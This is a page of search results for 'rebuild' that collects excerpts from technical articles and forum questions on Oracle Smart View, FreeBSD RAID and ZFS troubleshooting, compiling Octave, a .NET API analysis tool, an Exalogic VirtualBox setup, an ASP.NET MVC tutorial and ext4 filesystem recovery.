Search Results

Search found 906 results on 37 pages for 'rebuild'.

Page 34/37 | < Previous Page | 30 31 32 33 34 35 36 37  | Next Page >

  • Integrating Oracle Hyperion Smart View Data Queries with MS Word and Power Point

    - by Andreea Vaduva
    Untitled Document table { border: thin solid; } Most Smart View users probably appreciate that they can use just one add-in to access data from the different sources they might work with, like Oracle Essbase, Oracle Hyperion Planning, Oracle Hyperion Financial Management and others. But not all of them are aware of the options to integrate data analyses not only in Excel, but also in MS Word or Power Point. While in the past, copying and pasting single numbers or tables from a recent analysis in Excel made the pasted content a static snapshot, copying so called Data Points now creates dynamic, updateable references to the data source. It also provides additional nice features, which can make life easier and less stressful for Smart View users. So, how does this option work: after building an ad-hoc analysis with Smart View as usual in an Excel worksheet, any area including data cells/numbers from the database can be highlighted in order to copy data points - even single data cells only.   TIP It is not necessary to highlight and copy the row or column descriptions   Next from the Smart View ribbon select Copy Data Point. Then transfer to the Word or Power Point document into which the selected content should be copied. Note that in these Office programs you will find a menu item Smart View;from it select the Paste Data Point icon. The copied details from the Excel report will be pasted, but showing #NEED_REFRESH in the data cells instead of the original numbers. =After clicking the Refresh icon on the Smart View menu the data will be retrieved and displayed. (Maybe at that moment a login window pops up and you need to provide your credentials.) It works in the same way if you just copy one single number without any row or column descriptions, for example in order to incorporate it into a continuous text: Before refresh: After refresh: From now on for any subsequent updates of the data shown in your documents you only need to refresh data by clicking the Refresh button on the Smart View menu, without copying and pasting the context or content again. As you might realize, trying out this feature on your own, there won’t be any Point of View shown in the Office document. Also you have seen in the example, where only a single data cell was copied, that there aren’t any member names or row/column descriptions copied, which are usually required in an ad-hoc report in order to exactly define where data comes from or how data is queried from the source. Well, these definitions are not visible, but they are transferred to the Word or Power Point document as well. They are stored in the background for each individual data cell copied and can be made visible by double-clicking the data cell as shown in the following screen shot (but which is taken from another context).   So for each cell/number the complete connection information is stored along with the exact member/cell intersection from the database. And that’s not all: you have the chance now to exchange the members originally selected in the Point of View (POV) in the Excel report. Remember, at that time we had the following selection:   By selecting the Manage POV option from the Smart View meny in Word or Power Point…   … the following POV Manager – Queries window opens:   You can now change your selection for each dimension from the original POV by either double-clicking the dimension member in the lower right box under POV: or by selecting the Member Selector icon on the top right hand side of the window. After confirming your changes you need to refresh your document again. Be aware, that this will update all (!) numbers taken from one and the same original Excel sheet, even if they appear in different locations in your Office document, reflecting your recent changes in the POV. TIP Build your original report already in a way that dimensions you might want to change from within Word or Power Point are placed in the POV. And there is another really nice feature I wouldn’t like to miss mentioning: Using Dynamic Data Points in the way described above, you will never miss or need to search again for your original Excel sheet from which values were taken and copied as data points into an Office document. Because from even only one single data cell Smart View is able to recreate the entire original report content with just a few clicks: Select one of the numbers from within your Word or Power Point document by double-clicking.   Then select the Visualize in Excel option from the Smart View menu. Excel will open and Smart View will rebuild the entire original report, including POV settings, and retrieve all data from the most recent actual state of the database. (It might be necessary to provide your credentials before data is displayed.) However, in order to make this work, an active online connection to your databases on the server is necessary and at least read access to the retrieved data. But apart from this, your newly built Excel report is fully functional for ad-hoc analysis and can be used in the common way for drilling, pivoting and all the other known functions and features. So far about embedding Dynamic Data Points into Office documents and linking them back into Excel worksheets. You can apply this in the described way with ad-hoc analyses directly on Essbase databases or using Hyperion Planning and Hyperion Financial Management ad-hoc web forms. If you are also interested in other new features and smart enhancements in Essbase or Hyperion Planning stay tuned for coming articles or check our training courses and web presentations. You can find general information about offerings for the Essbase and Planning curriculum or other Oracle-Hyperion products here (please make sure to select your country/region at the top of this page) or in the OU Learning paths section , where Planning, Essbase and other Hyperion products can be found under the Fusion Middleware heading (again, please select the right country/region). Or drop me a note directly: [email protected] . About the Author: Bernhard Kinkel started working for Hyperion Solutions as a Presales Consultant and Consultant in 1998 and moved to Hyperion Education Services in 1999. He joined Oracle University in 2007 where he is a Principal Education Consultant. Based on these many years of working with Hyperion products he has detailed product knowledge across several versions. He delivers both classroom and live virtual courses. His areas of expertise are Oracle/Hyperion Essbase, Oracle Hyperion Planning and Hyperion Web Analysis.  

    Read the article

  • Cannot create zpool, how to get rid of intel raid volume?

    - by nagylzs
    This is a FreeBSD 9.1 amd64 computer. It has 5 disks installed. The ada0 and ada1 disks are used with a hw raid to provide the root filesystem: root@gw:/home/gandalf # ls /dev | grep ada ada0 ada1 ada2 ada3 ada4 root@gw:/home/gandalf # zpool status pool: zroot state: ONLINE scan: none requested config: NAME STATE READ WRITE CKSUM zroot ONLINE 0 0 0 raid/r0s1a ONLINE 0 0 0 errors: No known data errors I want to create a raidz pool for the remaining disks: root@gw:/home/gandalf # zpool create -f data raidz1 ada2 ada3 ada4 cannot create 'data': one or more devices is currently unavailable root@gw:/home/gandalf # dmesg | grep ada2 ada2 at ata4 bus 0 scbus6 target 0 lun 0 ada2: <WDC WD20EARS-00MVWB0 51.0AB51> ATA-8 SATA 2.x device ada2: 300.000MB/s transfers (SATA 2.x, UDMA5, PIO 8192bytes) ada2: 1907729MB (3907029168 512 byte sectors: 16H 63S/T 16383C) ada2: Previously was known as ad16 root@gw:/home/gandalf # dmesg | grep ada3 ada3 at ata5 bus 0 scbus7 target 0 lun 0 ada3: <SAMSUNG HD103UJ 1AA01118> ATA-7 SATA 2.x device ada3: 300.000MB/s transfers (SATA 2.x, UDMA5, PIO 8192bytes) ada3: 953868MB (1953523055 512 byte sectors: 16H 63S/T 16383C) ada3: Previously was known as ad18 GEOM_RAID: Intel-fb8732fa: Disk ada3 state changed from NONE to ACTIVE. GEOM_RAID: Intel-fb8732fa: Subdisk Volume0:0-ada3 state changed from NONE to ACTIVE. root@gw:/home/gandalf # dmesg | grep ada4 ada4 at ata6 bus 0 scbus8 target 0 lun 0 ada4: <TOSHIBA DT01ACA100 MS2OA750> ATA-8 SATA 3.x device ada4: 300.000MB/s transfers (SATA 2.x, UDMA5, PIO 8192bytes) ada4: 953869MB (1953525168 512 byte sectors: 16H 63S/T 16383C) ada4: Previously was known as ad20 root@gw:/home/gandalf # dmesg | grep GEOM_RAID Aha, so ada3 is already part of another raid volume? Let's see: root@gw:/home/gandalf # dmesg | grep GEOM_RAID GEOM_RAID: SiI-130628113902: Array SiI-130628113902 created. GEOM_RAID: SiI-130628113902: Disk ada0 state changed from NONE to ACTIVE. GEOM_RAID: SiI-130628113902: Subdisk SiI Raid1 Set:1-ada0 state changed from NONE to STALE. GEOM_RAID: SiI-130628113902: Disk ada1 state changed from NONE to ACTIVE. GEOM_RAID: SiI-130628113902: Subdisk SiI Raid1 Set:0-ada1 state changed from NONE to STALE. GEOM_RAID: SiI-130628113902: Array started. GEOM_RAID: SiI-130628113902: Subdisk SiI Raid1 Set:0-ada1 state changed from STALE to ACTIVE. GEOM_RAID: SiI-130628113902: Subdisk SiI Raid1 Set:1-ada0 state changed from STALE to RESYNC. GEOM_RAID: SiI-130628113902: Subdisk SiI Raid1 Set:1-ada0 rebuild start at 0. GEOM_RAID: SiI-130628113902: Volume SiI Raid1 Set state changed from STARTING to SUBOPTIMAL. GEOM_RAID: SiI-130628113902: Provider raid/r0 for volume SiI Raid1 Set created. GEOM_RAID: Intel-fb8732fa: Array Intel-fb8732fa created. GEOM_RAID: Intel-fb8732fa: Force array start due to timeout. GEOM_RAID: Intel-fb8732fa: Disk ada3 state changed from NONE to ACTIVE. GEOM_RAID: Intel-fb8732fa: Subdisk Volume0:0-ada3 state changed from NONE to ACTIVE. GEOM_RAID: Intel-fb8732fa: Array started. GEOM_RAID: Intel-fb8732fa: Volume Volume0 state changed from STARTING to DEGRADED. GEOM_RAID: Intel-fb8732fa: Provider raid/r1 for volume Volume0 created. root@gw:/home/gandalf # Yes, indeed. I want to get rid of raid/r1 completely. However, the controller was already set to "IDE" mode in the BIOS. So why it is creating a raid volume??? I have also tried overwritting the first 16k data of ada3 and reboot the computer, but it did not help. How can I delete /dev/raid/r1 ? root@gw:/home/gandalf # graid status Name Status Components raid/r0 SUBOPTIMAL ada0 (ACTIVE (RESYNC 4%)) ada1 (ACTIVE (ACTIVE)) raid/r1 DEGRADED ada3 (ACTIVE (ACTIVE)) root@gw:/home/gandalf # graid delete raid/r1 graid: Array 'raid/r1' not found. root@gw:/home/gandalf # graid delete /dev/raid/r1 graid: Array '/dev/raid/r1' not found. root@gw:/home/gandalf # Thanks

    Read the article

  • In what (small) ways can I modify Octave's compile options to enhance it without breaking it?

    - by irrational John
    If the title to this question seems a bit vague, I am sorry. But I wasn't sure how to distill what I am attempting to do into a single sentence. A few weeks back I learned that I could build and install recent releases of Octave on an Ubuntu 12.04 system by following the steps below. Install the tools needed to compile, link, and run octave. For Ubuntu the commands below have worked for me. sudo apt-get build-dep octave3.2 sudo apt-get install build-essential gnuplot gtk2-engines-pixbuf sudo apt-get install libfontconfig-dev bison Next, download the source code for an Octave release from the Gnu Project Archives for Octave and unpack the archive into a folder on your system. Use the commands below to build, check, and install octave. ./configure make make check sudo make install Unfortunately it turns out that the above builds an Octave that contains all the debugging symbol tables. The object files alone are huge taking up around 1.7 GB. The current Octave documentation suggests To compile without debugging symbols try the command make CFLAGS=-O CXXFLAGS=-O LDFLAGS= instead of just make. However, when I tried this it did not work. The -g option was still used for the compiles. For the heck of it I instead tried ./configure CFLAGS=-O CXXFLAGS=-O and this did work. (Instead of ~1.7GB the result of the build now takes up around 253MB). My questions are Is this actually the correct (recommended?) method to use to compile Octave without debugging symbols (i.e. without -g)? How would I compile Octave so it uses x86_64 rather than x86? Note: I am not asking how to compile Octave to use the (experimental) 64-bit integers for array dimensions. I just want to allow the compiler to use the extra registers and word sizes available when an app runs in 64-bit mode. Is a (more) complete list available for the directives used with the Octave Makefile? I have only seen make, make check, and make install documented. But apparently make distclean is also allowed. (It removes the compilation results so you can do a complete rebuild of everything.) I'm wondering what else might be available. FWIW, I have tried using ./configure CFLAGS="-O3 -mtune=core2 -m64" CXXFLAGS="-O3 -mtune=core2 -m64" and, surprisingly, it not only appeared to build, but also ran and passed the make check tests. The ./configure script even gave me the (deceptively?) reassuring message "Octave is now configured for x86_64-unknown-linux-gnu". But of course that's not the same thing as saying it actually "works". Is there a recommended way to enable Octave to run as an x86_64 app? I have also tried looking inside the Octave Makefile to see if I could decipher what command line directives it accepts. I got nowhere. I have not a single clue as to how that Makefile does whatever it is that it does.

    Read the article

  • ApiChange Is Released!

    - by Alois Kraus
    I have been working on little tool to simplify my life and perhaps yours as developer as well. It is basically a command line tool that allows you to execute queries on your compiled .NET code base. The main purpose is to find out how big the impact of an api change would be if you changed this or that.  Now you can do high level operations like Diff public types for breaking changes. Who uses a method? Who uses a type? Who uses implements an interface? Who references me? What format has the binary  (32/64, Managed C++, Pure IL, Unmanaged)? Search for all event subscribers and unsubscribers. A unique feature is to check for event subscription imbalances. Forgotten event subscriptions are the 90% cause of managed memory leaks. It is done at a per class level. If one class does subscribe to one event more often than it does unsubscribe it is treated as possible event subscription imbalance. Another unique ability is to search for users of string literals which allows you to track users of a string constant which is not possible otherwise. For incremental builds the ShowRebuildTargets command can be used to identify the dependant targets that need a rebuild after you did compile one assembly. It has some heuristics in place to determine the impact of breaking changes and finds out which targets need to be recompiled as well. It has a ton of other features and a an API to access these things programmatically so you can build upon these simple queries create even better tools. Perhaps we get a Visual Studio plug in? You can download it from CodePlex here. It works via XCopy deployment. Simply let it run and check the command line help out. The best feature in my opinion is that the output of nearly all commands can be piped to Excel for further analysis. Since it does read also the pdbs it can show you the source file name and line number as well for all matches. The following picture shows the output of a –WhousesType query. The following command checks where type from BaseLibraryV1.dll are used inside DependantLibV1.dll. All matches are printed out with the reason and matching item along with file and line number. There is even a hyper link to the match which will open Visual Studio. ApiChange -whousestype "*" BaseLibraryV1.dll -in DependantLibV1.dll –excel The "*” is the actual query which means all types. The syntax is the same like in C# just that placeholders are allowed ;-). More info's can be found at the Codeplex Documentation.     The tool was developed in a TDD style manner which means that it is heavily tested and already used by a quite large user base inside the company I do work for. Luckily for you I got the permission to make it public so you take advantage of it. It is fully instrumented with tracing. If you find bugs simply add the –trace command line switch to find out what is failing and send me the output. How is it done? Your first guess might be that it uses reflection. Wrong. It is based on Mono Cecil a free IL parser with a fantastic API to access all internals of a managed assembly. The speed is awesome and to make it even faster I did make the tool heavily multi threaded. The query above did execute in 1.8s with the Excel output. On a rather slow machine I can analyze over 1500 assemblies in less than 40s with a very low memory consumption. The true power of Mono Cecil is that I can load an assembly like any other data file. I have no problems unloading a file but if I would have used reflection I would need to unload a whole AppDomain just to get rid of one assembly in my memory. Just to give you a glimpse how ApiChange.Api.dll can be used I show you one of the unit tests:           public void Can_Find_GenericMethodInvocations_With_Type_Parameters()         { // 1. Create an aggregator to collect our matches             UsageQueryAggregator agg = new UsageQueryAggregator();   // 2. This is the type we want to search for. Load it via the type query             var decimalType = TypeQuery.GetTypeByName(TestConstants.MscorlibAssembly, "System.Decimal");   // 3. register the type query which searches for uses of the Decimal type             new WhoUsesType(agg, decimalType);   // 4. Search for all users of the Decimal type in the DependandLibV1Assembly             agg.Analyze(TestConstants.DependandLibV1Assembly);   // Extract matches and assert             Assert.AreEqual(2, agg.MethodMatches.Count, "Method match count");             Assert.AreEqual("UseGenericMethod", agg.MethodMatches[0].Match.Name);             Assert.AreEqual("UseGenericMethod", agg.MethodMatches[1].Match.Name);         } Many thanks go from here to Jb Evian for the creation of Mono.Cecil. Without this fantastic piece of code it would have been much much harder. There are other options around like the Common Compiler Infrastructure  Metadata Api which should do the same thing but it was not a real option since the Microsoft reader did fail on even simple assemblies (at least in September 2009 this was the case). Besides this I found the CCI Apis much harder to use. The only real competitor was Reflector which does support many things but does not let me access his cool high level analyze commands. So I decided to dig into the IL specs and as a result you can query your compiled binaries from the command line or programmatically. The best thing is you try it out for yourself and give me some feedback what you miss. If you want to contribute or have a cool idea what should be added drop me a mail at A Kraus1@___No [email protected]. There is much more inside the tool I did not talk about it (yet).

    Read the article

  • Exalogic 2.0.1 Tea Break Snippets - Creating a ModifyJeOS VirtualBox

    - by The Old Toxophilist
    Following on from my previous blog entry "Modifying the Base Template" I decided to put together a quick blog to show how to create a small VirtualBox, guest, that can be used to execute the ModifyJeOS and hence edit you templates. One of the main advantages of this is that Templates can be created away from the Exalogic Environment. For the Guest OS I chose OEL 6u3 and decided to create it as a basic server because I did not require a graphical interface but it's a simple change to create it with a GUI. Required Software Virtual Box. Oracle Enterprise Linux. Creating the VM I'll assume that the reader is experienced with Virtual Box and installing OEL and hence will make this section brief. Create VirtualBox Guest Create a new VirtualBox Guest and select oracle Linux 64 bit. Follow through the create process and select Dynamic Disk Size and the default 12GB disk size. The actual image will be a lot smaller than this but the OEL install will fail with insufficient disk space if you attempt a smaller size. Once the guest has been created attach the previously downloaded OEL 6u3 iso to the cd drive and start the guest. Install OEL On starting the guest the system will boot off the associated OEL 6u3 iso and take you through the standard installation process. Select all the appropriate information but when you reach the installation type select Basic Server because we do not need that additional packages and only need to access through the command line interface. Complete the installation and reboot the Guest. At this point we now have a basic OEL server running. Installing Guest Add-ons Before we can easily access the Guest we will need to add the VirtualBox guest add-ons. These will provide better keyboard and mouse integration and allow access the shared folders on the host machine. Before we can do this we will need to do the following: Enable Networking. Install additional rpms.  To enable the networking (eth0), that appears to be disabled by default, we can execute: ifup eth0 This will start the eth0 connection but once the Guest is rebooted the network will be down again. To resolve this you will need to edit the /etc/sysconfig/network-scripts/ifcfg-eth0 file and change the ONBOOT parameter to "yes". Now we have enabled the network we will need to install a number of addition rpm. First we will need to configure the yum repository as follows: [ol6_latest] name=Oracle Linux $releasever Latest ($basearch) baseurl=http://public-yum.oracle.com/repo/OracleLinux/OL6/latest/$basearch/ gpgkey=http://public-yum.oracle.com/RPM-GPG-KEY-oracle-ol6 gpgcheck=1 enabled=1 [ol6_ga_base] name=Oracle Linux $releasever GA installation media copy ($basearch) baseurl=http://public-yum.oracle.com/repo/OracleLinux/OL6/0/base/$basearch/ gpgkey=http://public-yum.oracle.com/RPM-GPG-KEY-oracle-ol6 gpgcheck=1 enabled=0 [ol6_u1_base] name=Oracle Linux $releasever Update 1 installation media copy ($basearch) baseurl=http://public-yum.oracle.com/repo/OracleLinux/OL6/1/base/$basearch/ gpgkey=http://public-yum.oracle.com/RPM-GPG-KEY-oracle-ol6 gpgcheck=1 enabled=0 [ol6_u2_base] name=Oracle Linux $releasever Update 2 installation media copy ($basearch) baseurl=http://public-yum.oracle.com/repo/OracleLinux/OL6/2/base/$basearch/ gpgkey=http://public-yum.oracle.com/RPM-GPG-KEY-oracle-ol6 gpgcheck=1 enabled=0 [ol6_u3_base] name=Oracle Linux $releasever Update 3 installation media copy ($basearch) baseurl=http://public-yum.oracle.com/repo/OracleLinux/OL6/3/base/$basearch/ gpgkey=http://public-yum.oracle.com/RPM-GPG-KEY-oracle-ol6 gpgcheck=1 enabled=0 [ol6_UEK_latest] name=Latest Unbreakable Enterprise Kernel for Oracle Linux $releasever ($basearch) baseurl=http://public-yum.oracle.com/repo/OracleLinux/OL6/UEK/latest/$basearch/ gpgkey=http://public-yum.oracle.com/RPM-GPG-KEY-oracle-ol6 gpgcheck=1 enabled=1 [ol6_UEK_base] name=Unbreakable Enterprise Kernel for Oracle Linux $releasever ($basearch) baseurl=http://public-yum.oracle.com/repo/OracleLinux/OL6/UEK/base/$basearch/ gpgkey=http://public-yum.oracle.com/RPM-GPG-KEY-oracle-ol6 gpgcheck=1 enabled=0 Once the repository has been edited we will need to execute the following yum commands: yum update yum install gcc yum install kernel-uek-devel yum install kernel-devel yum install createrepo At this point we now have all the additional packages required to install the VirtualBox Guest Add-ons. So select Devices->InstallGuest Additions on you running guest: This will simply place the VirtualBoxGuestAdditions.iso in the virtual cd and we will need to execute the following before we can run them. mkdir /media/cdrom mount -t iso9660 -o ro /dev/cdrom /media/cdrom cd /media/cdrom/ ls ./VBoxLinuxAdditions.run This will initiate the install and kernel rebuild. What you will notice is that during the installation a Failed will be displayed but this is simply because we have no graphical components. At this point we the installation will also have added the vboxsf group to the system and to access any shared folders we will create our user will need to be a member of this group an so the next stage is to add the root user to this group as follows: usermod -G vboxsf root cat /etc/group cat /etc/passwd init 0 Now simply shutdown the guest and add the Shared folder within your guests settings. Install ModifyJeOS Once the shared folder has been added restart the guest and change directory into the shared folder (/media/sf_<folder name>). For the next step I am assuming the ModifyJeOS rpms are located in the shared folder. We can simply execute: rpm -ivh ovm-modify-jeos-1.1.0-17.el5.noarch.rpm # Test with modifyjeos Using ModifyJeOS I have a modified MountSystemImg.sh script that should be copied into the /root/bin directory (you may need to create this) and from here it can be executed from any location: MountSystemImg.sh #!/bin/sh # The script assumes it's being run from the directory containing the System.img # Export for later i.e. during unmount export LOOP=`losetup -f` export SYSTEMIMG=/mnt/elsystem export TEMPLATEDIR=`pwd` # Make Temp Mount Directory mkdir -p $SYSTEMIMG # Create Loop for the System Image losetup $LOOP System.img kpartx -a $LOOP mount /dev/mapper/`basename $LOOP`p2 $SYSTEMIMG #Change Dir into mounted Image cd $SYSTEMIMG echo "######################################################################" echo "### ###" echo "### Starting Bash shell for editing. When completed log out to ###" echo "### Unmount the System.img file. ###" echo "### ###" echo "######################################################################" echo bash cd ~ cd $TEMPLATEDIR umount $SYSTEMIMG kpartx -d $LOOP losetup -d $LOOP rm -rf $SYSTEMIMG This script will simple create a mount directory, mount the System.img and then start a new shell in the mounted directory. On exiting the shell it will unmount the System.img. It only requires that you execute the script in the directory containing the System.img. These can be created under the mounted shared directory. In the example below I have extracted the Base template within the shared folder and then renamed it OEL_40GB_ROOT before changing into that directory and executing the script.

    Read the article

  • Causes of sudden massive filesystem damage? ("root inode is not a directory")

    - by poolie
    I have a laptop running Maverick (very happily until yesterday), with a Patriot Torx SSD; LUKS encryption of the whole partition; one lvm physical volume on top of that; then home and root in ext4 logical volumes on top of that. When I tried to boot it yesterday, it complained that it couldn't mount the root filesystem. Running fsck, basically every inode seems to be wrong. Both home and root filesystems show similar problems. Checking a backup superblock doesn't help. e2fsck 1.41.12 (17-May-2010) lithe_root was not cleanly unmounted, check forced. Resize inode not valid. Recreate? no Pass 1: Checking inodes, blocks, and sizes Root inode is not a directory. Clear? no Root inode has dtime set (probably due to old mke2fs). Fix? no Inode 2 is in use, but has dtime set. Fix? no Inode 2 has a extra size (4730) which is invalid Fix? no Inode 2 has compression flag set on filesystem without compression support. Clear? no Inode 2 has INDEX_FL flag set but is not a directory. Clear HTree index? no HTREE directory inode 2 has an invalid root node. Clear HTree index? no Inode 2, i_size is 9581392125871137995, should be 0. Fix? no Inode 2, i_blocks is 40456527802719, should be 0. Fix? no Reserved inode 3 (<The ACL index inode>) has invalid mode. Clear? no Inode 3 has compression flag set on filesystem without compression support. Clear? no Inode 3 has INDEX_FL flag set but is not a directory. Clear HTree index? no .... Running strings across the filesystems, I can see there are what look like filenames and user data there. I do have sufficiently good backups (touch wood) that it's not worth grovelling around to pull back individual files, though I might save an image of the unencrypted disk before I rebuild, just in case. smartctl doesn't show any errors, neither does the kernel log. Running a write-mode badblocks across the swap lv doesn't find problems either. So the disk may be failing, but not in an obvious way. At this point I'm basically, as they say, fscked? Back to reinstalling, perhaps running badblocks over the disk, then restoring from backup? There doesn't even seem to be enough data to file a meaningful bug... I don't recall that this machine crashed last time I used it. At this point I suspect a bug or memory corruption caused it to write garbage across the disks when it was last running, or some kind of subtle failure mode for the SSD. What do you think would have caused this? Is there anything else you'd try?

    Read the article

  • Dell Latitude E6430 Docking Station + Dual Monitor + Laptop Screen Tri-Monitor setup

    - by Larry
    I have a company issued laptop and docking station as well as two monitors The specifications of the hardware are as follows; Laptop: Latitude E6430 BIOS: A02.00 Processor: i7-3720QM CPU @ 2.60 (8 CPUs) Memory: 4096MB RAM Page file: 1825MB used, 4793MB available DirectX 11 Display Driver/Chip: MVIDIA NVS 5200M DAC: Integrated RAMDAC Aprox Total Memory: 2376 (Above 3 details same for both displays) Current Display Mode (Display 1): 1600x900 Current Display Mode (Display 2): 1440x900 the docking station is a Dell Latitude E6420 Docking Station PR03X Port Replicator and I don't think the monitor model is particularly relevant to resolving this issue but they are both Acer V193Ws The story goes like this; the laptop works fine if I VGA one monitor into the laptop through the vga port on the back of the lefthand side of the laptop I can achieve dual monitor display fine (laptop screen + monitor) if I plug the laptop into the docking station and use the vga port in the back of the docking station I can dual monitor fine (laptop screen + monitor) if I plug the laptop into the docking station, the laptop's lefthand side VGA port no longer seems to function at all I've spoken to internal IT about this issue and they're going to get me some kind of VGA splitter or a DVI-VGA adapter to use with the docking station for the second Acer Monitor, but that isn't going to happen for a few days. So I guess what I'm wondering is; is there any way to continue to use the side VGA port on my laptop while using the docking station VGA port? and as a secondary 'followup' pending resolution of the initial issue with getting both monitors up and running (at the moment I have both monitors on my desk but am just using my laptop screen as one of my dual monitor display with one of the monitors [the one connected to dock]), is there any way to CONTINUE to use my laptop monitor to in effect have a triple monitor display (2 monitors + docked laptop)? I am wondering this because internal IT told me that they were aware of some issues with the particular display drivers in my box and triple monitor displays but weren't really going to look TOO much in-depth into that (which is perfectly understandable) since getting the adapter for the dual monitors up and running was the greater priority within their purview. So this is a two parter; Can I dual monitor using two vga cables with 1 docking station vga port and one laptop vga port? is there a setting that can be tweaked somewhere? because plugging the box into the station seems to make the side port stop working and... Is there any reasonably simple and cost-effective work around (e.g. I am find with shelling out maybe a few dollars out of my own pocket for some hardware or software to make my company box tri-display capable) but if this requires some extensive rebuild or new OSs or doing stuff to the BIOS I'd rather have a straight answer about this being untenable as a slight modification to a (once again) company laptop and stop wasting time looking into it Thanks! and please let me know if you guys need any more details (tech specs or something) to answer this question [EDIT] 2/10/2014 Just an update; turned out it really was just a hardware limitation issue. The old laptop just couldn't hack it. Got a new laptop with a better video card and different monitors from my company and am successfully using a triple display currently (2 monitors + laptop screen)

    Read the article

  • MVC Razor Engine For Beginners Part 1

    - by Humprey Cogay, C|EH, E|CSA
    I. What is MVC? a. http://www.asp.net/mvc/tutorials/older-versions/overview/asp-net-mvc-overview II. Software Requirements for this tutorial a. Visual Studio 2010/2012. You can get your free copy here Microsoft Visual Studio 2012 b. MVC Framework Option 1 - Install using a standalone installer http://www.microsoft.com/en-us/download/details.aspx?id=30683 Option 2 - Install using Web Platform Installer http://www.microsoft.com/web/handlers/webpi.ashx?command=getinstallerredirect&appid=MVC4VS2010_Loc III. Creating your first MVC4 Application a. On the Visual Studio click file new solution link b. Click Other Project Type>Visual Studio Solutions and on the templates window select blank solution and let us name our solution MVCPrimer. c. Now Click File>New and select Project d. Select Visual C#>Web> and select ASP.NET MVC 4 Web Application and Enter MyWebSite as Name e. Select Empty, Razor as view engine and uncheck Create a Unit test project f. You can now view a basic MVC 4 Application Structure on your solution explorer g. Now we will add our first controller by right clicking on the controllers folder on your solution explorer and select Add>Controller h. Change the name of the controller to HomeController and under the scaffolding options select Empty MVC Controller. i. You will now see a basic controller with an Index method that returns an ActionResult j. We will now add a new View Folder for our Home Controller. Right click on the views folder on your solution explorer and select Add> New Folder> and name this folder Home k. Add a new View by right clicking on Views>Home Folder and select Add View. l. Name the view Index, and select Razor(CSHTML) as View Engine, All checkbox should be unchecked for now and click add. m. Relationship between our HomeController and Home Views Sub Folder n. Add new HTML Contents to our newly created Index View o. Press F5 to run our MVC Application p. We will create our new model, Right click on the models folder of our solution explorer and select Add> Class. q. Let us name our class Customer r. Edit the Customer class with the following code s. Open the HomeController by double clickin HomeController of our Controllers folder and edit the HomeControllerusing System; using System.Collections.Generic; using System.Linq; using System.Web; using System.Web.Mvc;   namespace MyWebSite.Controllers {     public class HomeController : Controller     {         //         // GET: /Home/           public ActionResult Index()         {             return View();         }           public ActionResult ListCustomers()         {             List<Models.Customer> customers = new List<Models.Customer>();               //Add First Customer to Our Collection             customers.Add(new Models.Customer()                     {                         Id = 1,                         CompanyName = "Volvo",                         ContactNo = "123-0123-0001",                         ContactPerson = "Gustav Larson",                         Description = "Volvo Car Corporation, or Volvo Personvagnar AB, is a Scandinavian automobile manufacturer founded in 1927"                     });                 //Add Second Customer to Our Collection             customers.Add(new Models.Customer()                     {                         Id = 2,                         CompanyName = "BMW",                         ContactNo = "999-9876-9898",                         ContactPerson = "Franz Josef Popp",                         Description = "Bayerische Motoren Werke AG,  (BMW; English: Bavarian Motor Works) is a " +                                       "German automobile, motorcycle and engine manufacturing company founded in 1917. "                     });                 //Add Third Customer to Our Collection             customers.Add(new Models.Customer()             {                 Id = 3,                 CompanyName = "Audi",                 ContactNo = "983-2222-1212",                 ContactPerson = "Karl Benz",                 Description = " is a multinational division of the German manufacturer Daimler AG,"             });               return View(customers);         }     } } t. Let us now create a view for this Class, But before continuing Press Ctrl + Shift + B to rebuild the solution, this will make the previously created model on the Model class drop down of the Add View Menu. Right click on the views>Home folder and select Add>View u. Let us name our View as ListCustomers, Select Razor(CSHTML) as View Engine, Put a check mark on Create a strongly-typed view, and select Customer (MyWebSite.Models) as model class. Slect List on the Scaffold Template and Click OK. v. Run the MVC Application by pressing F5, and on the address bar insert Home/ListCustomers, We should now see a web page similar below.   x. You can edit ListCustomers.CSHTML to remove and add HTML codes @model IEnumerable<MyWebSite.Models.Customer>   @{     Layout = null; }   <!DOCTYPE html>   <html> <head>     <meta name="viewport" content="width=device-width" />     <title>ListCustomers</title> </head> <body>     <h2>List of Customers</h2>     <table border="1">         <tr>             <th>                 @Html.DisplayNameFor(model => model.CompanyName)             </th>             <th>                 @Html.DisplayNameFor(model => model.Description)             </th>             <th>                 @Html.DisplayNameFor(model => model.ContactPerson)             </th>             <th>                 @Html.DisplayNameFor(model => model.ContactNo)             </th>         </tr>         @foreach (var item in Model) {         <tr>             <td>                 @Html.DisplayFor(modelItem => item.CompanyName)             </td>             <td>                 @Html.DisplayFor(modelItem => item.Description)             </td>             <td>                 @Html.DisplayFor(modelItem => item.ContactPerson)             </td>             <td>                 @Html.DisplayFor(modelItem => item.ContactNo)             </td>                   </tr>     }         </table> </body> </html> y. Press F5 to run the MVC Application   z. You will notice some @HTML.DisplayFor codes. These are called HTML Helpers you can read more about HTML Helpers on this site http://www.w3schools.com/aspnet/mvc_htmlhelpers.asp   That’s all. You now have your first MVC4 Razor Engine Web Application . . .

    Read the article

  • How can I recover an ext4 filesystem corrupted after a fsck?

    - by Regan
    I have an ext4 filesystem on luks over software raid5. The filesystem was operating "just fine" for several years when I was beginning to run out of space. I had a 9T volume on 6x2T drives. I began upgrading to 3T drives by doing the mdadm fail, remove, add, rebuild, repeat process until I had a larger array. I then grew the luks container, and then when I unmounted and tried to resize2fs I was given the message the filesystem was dirty and needed e2fsck. Without thinking I just did e2fsck -y /dev/mapper/candybox and it began spewing all kinds of inode being removed type messages (can't remember exactly) I killed e2fsck and tried to remount the filesystem to backup data I was concerned about. When trying to mount at this point I get: # mount /dev/mapper/candybox /candybox mount: wrong fs type, bad option, bad superblock on /dev/mapper/candybox, missing codepage or helper program, or other error In some cases useful info is found in syslog - try dmesg | tail or so Looking back at my older logs I noticed the filesystem was giving this error each time the machine booted: kernel: [79137.275531] EXT4-fs (dm-2): warning: mounting fs with errors, running e2fsck is recommended So shame on me for not paying attention :( I then tried to mount using every backup superblock (one after another) and each attempt left this in my log: EXT4-fs (dm-2): ext4_check_descriptors: Checksum for group 0 failed (26534!=65440) EXT4-fs (dm-2): ext4_check_descriptors: Checksum for group 1 failed (38021!=36729) EXT4-fs (dm-2): ext4_check_descriptors: Checksum for group 2 failed (18336!=39845) ... EXT4-fs (dm-2): ext4_check_descriptors: Checksum for group 11911 failed (28743!=44098) BUG: soft lockup - CPU#0 stuck for 23s! [mount:2939] Attempts to restart e2fsck results in: # e2fsck /dev/mapper/candybox e2fsck 1.41.14 (22-Dec-2010) e2fsck: Group descriptors look bad... trying backup blocks... candy: recovering journal e2fsck: unable to set superblock flags on candy At this point, I decided it best to order some more drives and make an image using ddrescue Now two weeks later I have an image of the luks partition in a 